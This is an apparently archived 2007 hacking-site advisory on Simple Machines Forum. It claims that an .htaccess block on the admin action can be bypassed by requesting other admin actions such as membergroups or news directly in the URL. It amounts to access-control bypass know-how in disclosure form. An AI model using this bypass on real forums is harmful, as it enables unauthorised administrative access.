|
# ./start
#
# Discovered by Seph1roth on June 2007 (was priv8)
#
# Vulnerable: Simple Machine Forum [ALL Versions]
#
# Visit: http://www.blackroots.it - Best hacking site.
#
# Description:
If smf has index.php?action=admin in .htaccess ,i can bypass that by typing in the url some variable of administration panel :
example:
index.php?action=admin (.htaccess,then access denied)
index.php?action=membergroups (accessible)
index.php?action=news (accessible)
index.php?action=featuresettings (accessible)
...and others...
i can bypass and enter the administration by typing the accessible variables in the url...
# Greets to all BlackRoots Users
#
# Shoutz to all kiddies
#
# ./end